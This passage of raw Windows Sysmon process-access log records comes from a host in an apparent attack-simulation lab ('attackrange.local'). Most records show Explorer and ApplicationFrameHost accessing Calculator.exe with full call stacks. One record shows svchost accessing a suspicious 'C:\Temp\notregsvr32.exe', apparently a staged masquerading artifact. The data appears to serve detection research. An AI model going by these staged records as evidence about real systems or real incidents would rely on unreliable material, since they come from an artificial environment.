22:13:28.163{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361592Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361591Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337e-6013-9402-000000001100}75846036C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361590Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361589Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361588Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361587Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.163{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361586Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361585Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361584Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361583Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361582Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361581Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361580Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361579Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361578Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361577Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361576Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361575Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361574Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.147{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361573Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.132{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361572Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.132{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361571Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.132{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361570Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.132{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361569Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 